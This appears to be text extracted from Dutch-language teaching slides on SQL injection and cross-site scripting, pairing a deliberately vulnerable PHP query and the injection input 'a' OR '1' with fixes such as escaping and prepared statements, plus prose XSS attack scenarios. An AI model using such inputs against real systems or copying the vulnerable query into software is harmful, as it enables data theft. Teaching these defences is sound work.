SQL injections en meer... PERU
web application vulnerabilities Cross Site Scripting (21.5%) SQL Injection (14%) PHP includes (9.5%) Buffer overflows (7.9%)
SQL injections Geen input validation Hoe gaat het in zijn werk? Voorbeeld code
PHP voorbeeld $wachtwoord = $_POST['wachtwoord']; // maak verbinding met DB $result = query("SELECT geheimeinfo FROM tabel WHERE wachtwoord='$wachtwoord'"); Wat gebeurd er nu wanneer er “a' OR '1” wordt ingevoerd?
Hoe te voorkomen? escape de '$wachtwoord' variabele met 'addslashes' of beter 'mysql_real_escape_string'. $wachtwoord = $_POST['wachtwoord']; // maak verbinding met DB $result = query("SELECT geheimeinfo FROM tabel WHERE wachtwoord='". mysql_real_escape_string($wachtwoord). "'");
Hoe te voorkomen ? (II) gebruik prepared statements met de mysqli of de PDO Mysql extensies. Bijvoorbeeld (met mysqli): $wachtwoord = $_POST['wachtwoord']; // maak verbinding met DB $stmt = $DB->prepare("SELECT geheimeinfo FROM tabel WHERE wachtwoord = ?"); $stmt->bind_param("s", $wachtwoord); $stmt->bind_result($geheimeinfo); if ($stmt->execute && $stmt->fetch()){ // OK }else{ // niet OK } $stmt->close();
Validate input! Het leek eenvoudig... Maar we weten.. Validate input! Probeer niet te detecteren wat incorrect is Check of het correct is. Artikel IBMIBM
XSS Cross Site Scripting XSSXSS 3 soorten XSS aanvallen Dom-Based Non-Persistent Persistent
Een filmpje.. voorbeeld
De plot. Mallory posts a message to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can hijack Bob's session and impersonate Bob
Dom-Based attack Mallory sends the URL of a maliciously constructed web page to Alice, using or another mechanism. Alice clicks on the link. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
Non-Persisent Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an , making it look as if it came from Bob (i.e., the is spoofed). Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.
Persistent Bob hosts a web site which allows users to post messages and other content to the site for later viewing by other members. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's webserver without their knowledge. Later, Mallory logs in as other site users and posts messages on their behalf....
Hoe te voorkomen? Escaping and filtering Input validation Cookie security Eliminating scripts